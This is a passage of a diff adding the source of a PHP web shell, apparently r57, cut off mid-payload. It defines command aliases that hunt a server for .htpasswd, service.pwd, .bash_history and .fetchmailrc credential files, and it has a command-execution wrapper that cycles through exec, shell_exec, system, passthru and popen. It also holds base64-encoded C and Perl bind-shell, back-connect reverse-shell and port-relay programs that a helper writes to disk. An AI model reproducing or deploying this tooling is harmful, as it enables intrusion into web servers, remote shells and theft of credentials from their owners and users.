+/* ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories and files'=>'find / -perm -2 -ls',
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+/* ïîèñê íà ñåğâåğå ôàéëîâ service.pwd ... frontpage =))) */
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ service.pwd */
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+/* ïîèñê íà ñåğâåğå ôàéëîâ .htpasswd */
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .htpasswd */
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+/* ïîèñê âñåõ ôàéëîâ .bash_history */
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .bash_history */
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .fetchmailrc */
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+/* âûâîä ñïèñêà àòğèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+/* ïğîñìîòğ îòêğûòûõ ïîğòîâ */
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+
+/* html */
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow      = " <font face=Wingdings color=gray>è</font>";
+$lb         = "<font color=black>[</font>";
+$rb         = "<font color=black>]</font>";
+$font       = "<font face=Verdana size=-2>";
+
+/* change dir */
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+
+/* get OS */
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ { // íà ñëó÷àé åñëè íå óäàëîñü ïîëó÷èòü äèğåêòîğèş
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } // ïğîáóåì ïîëó÷èòü ÷åğåç php_uname()
+ if(empty($os)){ $os ="-"; $unix=1; } // åñëè íè÷åãî íå ïîëó÷èëîñü òî áóäåò unix =)
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+
+
+/* search text in files */
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); // show founded strings and die
+  }
+
+/* Ïğîâåğêà òîãî ìîæåì ëè ìû âûïîëíÿòü êîìàíäû ïğè âûêëş÷åííîì safe_mode. Åñëè íåò òî ñ÷èòàåì ÷òî ñåéô âêëş÷åí */
+/* Îáõîäèò íåâîçìîæíîñòü âûïîëíåíèÿ êîìàíä íà âèíäå êîãäà ñåéô âûêëş÷åí íî cmd.exe ïåğåèìåíîâàí                */
+/* ëèáî êîãäà â php.ini ïğîïèñàíû disable_functions                                                            */
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+
+/* get server info */
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+
+/* FUNCTIONS */
+
+/* WriteSpace */
+/* tnx to virus for idea */
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+
+function ex($cfe)
+{
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ if(!empty($res)) return $res; else return 0;
+}
+
+/* write error */
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* read error */
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïğî÷èòàòü ôàéë '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* create error */
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* permissions */
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) $type='p';
+else if( $mode & 0x2000 ) $type='c';
+else if( $mode & 0x4000 ) $type='d';
+else if( $mode & 0x6000 ) $type='b';
+else if( $mode & 0x8000 ) $type='-';
+else if( $mode & 0xA000 ) $type='l';
+else if( $mode & 0xC000 ) $type='s';
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+/* find path to */
+function which($pr)
+{
+if ($GLOBALS['windows']) { return 0; }
+$path = ex("which $pr");
+if(!empty($path)) return $path; else return 0;
+}
+
+/* create file */
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+
+  function DirPrintHTMLHeaders($dir)
+  {
+    $handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          if($count = @preg_match_all($pattern,$CurString,$aa))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+
+/*** base64 ---------------------------------------------------------------------------------------------------- */
+/* --- Port bind source C -------------------------------------------------------------------------------------- */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+/* --- END Port bind source C ---------------------------------------------------------------------------------- */
+/* --- Port bind source PERL ----------------------------------------------------------------------------------- */
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+/* --- END Port bind source PERL ------------------------------------------------------------------------------- */
+/* --- Back connect source PERL -------------------------------------------------------------------------------- */
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+/* --- END Back connect source PERL ---------------------------------------------------------------------------- */
+/* --- Back connect source C ----------------------------------------------------------------------------------- */
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+/* --- END Back connect source C ------------------------------------------------------------------------------- */
+/* --- datapipe.c ---------------------------------------------------------------------------------------------- */
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
